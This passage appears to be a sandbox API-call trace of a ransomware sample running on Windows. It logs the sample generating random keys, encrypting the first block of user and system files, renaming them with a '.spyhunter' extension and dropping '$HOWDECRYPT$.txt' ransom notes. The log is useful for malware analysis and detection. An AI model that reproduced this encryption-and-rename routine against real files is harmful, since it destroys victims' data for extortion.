[0144.034] GetProcessHeap () returned 0x2c0000 [0144.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0144.034] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.spyhunter") returned 90 [0144.034] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm.spyhunter")) returned 1 [0144.307] GetProcessHeap () returned 0x2c0000 [0144.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0144.308] GetProcessHeap () returned 0x2c0000 [0144.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0144.308] GetProcessHeap () returned 0x2c0000 [0144.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63f48 | out: hHeap=0x2c0000) returned 1 [0144.308] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efa0 | out: pbBuffer=0x57efa0) returned 1 [0144.308] GetProcessHeap () returned 0x2c0000 [0144.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0144.308] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef98*=0x30) returned 1 [0144.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.612] GetProcessHeap () returned 0x2c0000 [0144.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0144.612] GetProcessHeap () returned 0x2c0000 [0144.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef328 | out: hHeap=0x2c0000) returned 1 [0144.612] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efa0 | out: pbBuffer=0x57efa0) returned 1 [0144.612] GetProcessHeap () returned 0x2c0000 [0144.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0144.612] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef98*=0x30) returned 1 [0144.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.968] GetProcessHeap () returned 0x2c0000 [0144.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0144.968] GetProcessHeap () returned 0x2c0000 [0144.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c818a0 | out: hHeap=0x2c0000) returned 1 [0144.968] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef98 | out: pbBuffer=0x57ef98) returned 1 [0144.968] GetProcessHeap () returned 0x2c0000 [0144.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0144.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef90*=0x30) returned 1 [0144.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.310] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 85 [0145.310] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0145.310] GetProcessHeap () returned 0x2c0000 [0145.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.310] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef54, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ef54*=0x29a, lpOverlapped=0x0) returned 1 [0145.311] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.311] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x57ef54, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ef54*=0x29a, lpOverlapped=0x0) returned 1 [0145.311] GetProcessHeap () returned 0x2c0000 [0145.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.311] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.312] WriteFile (in: hFile=0x178, lpBuffer=0x57ef94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef54, lpOverlapped=0x0 | out: lpBuffer=0x57ef94*, lpNumberOfBytesWritten=0x57ef54*=0x4, lpOverlapped=0x0) returned 1 [0145.312] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef54*=0x30, lpOverlapped=0x0) returned 1 [0145.312] CloseHandle (hObject=0x178) returned 1 [0145.312] GetProcessHeap () returned 0x2c0000 [0145.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.312] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.spyhunter") returned 95 [0145.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.spyhunter")) returned 1 [0145.395] GetProcessHeap () returned 0x2c0000 [0145.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.395] GetProcessHeap () returned 0x2c0000 [0145.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.395] GetProcessHeap () returned 0x2c0000 [0145.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000608 | out: hHeap=0x2c0000) returned 1 [0145.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.395] GetProcessHeap () returned 0x2c0000 [0145.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f629b0 | out: hHeap=0x2c0000) returned 1 [0145.395] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef90 | out: pbBuffer=0x57ef90) returned 1 [0145.395] GetProcessHeap () returned 0x2c0000 [0145.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef88*=0x30) returned 1 [0145.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.396] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 85 [0145.397] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0145.397] GetProcessHeap () returned 0x2c0000 [0145.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.397] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ef4c*=0x28e, lpOverlapped=0x0) returned 1 [0145.398] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.398] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x57ef4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ef4c*=0x28e, lpOverlapped=0x0) returned 1 [0145.398] GetProcessHeap () returned 0x2c0000 [0145.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.398] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.398] WriteFile (in: hFile=0x178, lpBuffer=0x57ef8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef4c, lpOverlapped=0x0 | out: lpBuffer=0x57ef8c*, lpNumberOfBytesWritten=0x57ef4c*=0x4, lpOverlapped=0x0) returned 1 [0145.398] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef4c*=0x30, lpOverlapped=0x0) returned 1 [0145.399] CloseHandle (hObject=0x178) returned 1 [0145.399] GetProcessHeap () returned 0x2c0000 [0145.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.399] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.spyhunter") returned 95 [0145.399] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.spyhunter")) returned 1 [0145.542] GetProcessHeap () returned 0x2c0000 [0145.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.542] GetProcessHeap () returned 0x2c0000 [0145.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.542] GetProcessHeap () returned 0x2c0000 [0145.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000510 | out: hHeap=0x2c0000) returned 1 [0145.542] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef90 | out: pbBuffer=0x57ef90) returned 1 [0145.542] GetProcessHeap () returned 0x2c0000 [0145.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.542] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef88*=0x30) returned 1 [0145.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.543] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 125 [0145.543] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0145.543] GetProcessHeap () returned 0x2c0000 [0145.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0145.543] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ef4c*=0x2800, lpOverlapped=0x0) returned 1 [0145.567] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.567] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ef4c*=0x2800, lpOverlapped=0x0) returned 1 [0145.567] GetProcessHeap () returned 0x2c0000 [0145.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0145.567] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.567] WriteFile (in: hFile=0x178, lpBuffer=0x57ef8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef4c, lpOverlapped=0x0 | out: lpBuffer=0x57ef8c*, lpNumberOfBytesWritten=0x57ef4c*=0x4, lpOverlapped=0x0) returned 1 [0145.632] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef4c*=0x30, lpOverlapped=0x0) returned 1 [0145.632] CloseHandle (hObject=0x178) returned 1 [0145.632] GetProcessHeap () returned 0x2c0000 [0145.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.632] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.spyhunter") returned 135 [0145.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.spyhunter")) returned 1 [0145.633] GetProcessHeap () returned 0x2c0000 [0145.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.633] GetProcessHeap () returned 0x2c0000 [0145.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.633] GetProcessHeap () returned 0x2c0000 [0145.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f03ec8 | out: hHeap=0x2c0000) returned 1 [0145.633] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef88 | out: pbBuffer=0x57ef88) returned 1 [0145.633] GetProcessHeap () returned 0x2c0000 [0145.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.633] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef80*=0x30) returned 1 [0145.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.637] GetProcessHeap () returned 0x2c0000 [0145.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.637] GetProcessHeap () returned 0x2c0000 [0145.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe110 | out: hHeap=0x2c0000) returned 1 [0145.637] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef88 | out: pbBuffer=0x57ef88) returned 1 [0145.637] GetProcessHeap () returned 0x2c0000 [0145.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.637] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef80*=0x30) returned 1 [0145.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.670] GetProcessHeap () returned 0x2c0000 [0145.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.670] GetProcessHeap () returned 0x2c0000 [0145.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efdd30 | out: hHeap=0x2c0000) returned 1 [0145.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.670] GetProcessHeap () returned 0x2c0000 [0145.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffdca8 | out: hHeap=0x2c0000) returned 1 [0145.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.670] GetProcessHeap () returned 0x2c0000 [0145.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6ba8 | out: hHeap=0x2c0000) returned 1 [0145.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.671] GetProcessHeap () returned 0x2c0000 [0145.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7128 | out: hHeap=0x2c0000) returned 1 [0145.671] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef78 | out: pbBuffer=0x57ef78) returned 1 [0145.671] GetProcessHeap () returned 0x2c0000 [0145.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.671] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef70*=0x30) returned 1 [0145.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.671] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned 74 [0145.671] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.671] GetProcessHeap () returned 0x2c0000 [0145.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.671] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef34, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ef34*=0x2800, lpOverlapped=0x0) returned 1 [0145.682] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.682] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef34, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ef34*=0x2800, lpOverlapped=0x0) returned 1 [0145.683] GetProcessHeap () returned 0x2c0000 [0145.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.683] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.683] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef34, lpOverlapped=0x0 | out: lpBuffer=0x57ef74*, lpNumberOfBytesWritten=0x57ef34*=0x4, lpOverlapped=0x0) returned 1 [0145.684] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef34*=0x30, lpOverlapped=0x0) returned 1 [0145.684] CloseHandle (hObject=0x9c) returned 1 [0145.684] GetProcessHeap () returned 0x2c0000 [0145.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.684] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.spyhunter") returned 84 [0145.684] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll.spyhunter")) returned 1 [0145.685] GetProcessHeap () returned 0x2c0000 [0145.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.685] GetProcessHeap () returned 0x2c0000 [0145.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0145.685] GetProcessHeap () returned 0x2c0000 [0145.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7048 | out: hHeap=0x2c0000) returned 1 [0145.685] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef70 | out: pbBuffer=0x57ef70) returned 1 [0145.685] GetProcessHeap () returned 0x2c0000 [0145.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0145.685] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef68*=0x30) returned 1 [0145.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 